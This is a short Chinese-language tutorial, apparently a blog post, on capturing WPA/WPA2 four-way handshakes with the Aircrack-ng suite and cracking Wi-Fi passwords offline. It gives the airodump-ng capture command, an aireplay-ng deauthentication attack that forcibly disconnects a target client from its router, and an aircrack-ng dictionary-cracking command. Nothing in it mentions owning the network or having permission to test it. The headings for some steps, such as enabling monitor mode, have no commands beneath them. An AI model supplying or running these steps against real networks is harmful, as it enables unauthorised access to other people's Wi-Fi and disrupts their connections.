介绍
本篇将介绍如何使用 Aircrack-ng 对 WPA/WPA2 协议进行握手攻击,获取握手包以供离线暴力破解WiFi密码
前提条件
- 无线网卡
- Linux系统,如 Kali
- aircrack-ng 软件包
准备
- Kali Linux 系统自带 aircrack-ng
- 如果使用其他Linux发行版需要额外安装 aircrack-ng 软件包
Ubuntu
1
| sudo apt install aircrack-ng
|
Arch Linux
1
| sudo pacman -S aircrack-ng
|
其他Linux发行版请自行安装
开始
扫描
启用root账号
查看网络设备
网卡开启监听模式
嗅探WiFi
抓包
启动抓包
1
| airodump-ng -w capture -c 信道 --bssid 路由器MAC wlan0mon
|
Tips:
capture 为保存的握手包名称
该命令用于抓取 WPA/WPA2 四次握手包,用于离线密码破解
取消认证攻击
1
| aireplay-ng -0 5 -a 路由器MAC -c 客户端MAC wlan0mon
|
Tips:
5: 发送 5 个断开连接数据包
客户端MAC 请查看目录下.csv文件
这是一个 Deauthentication(取消认证)攻击命令,用于强制目标设备与Wi-Fi路由器断开连接,以便捕获WPA握手包
握手包将会保存为.cap文件,用于离线破解
关闭监听模式
破解密码
使用 aircrack-ng 简单破解
1
| aircrack-ng -w 字典文件.txt 抓取握手包名称.cap
|
高级破解
复杂密码可以使用 WIFIPR 或 hashcat 破解,本教程将不多赘述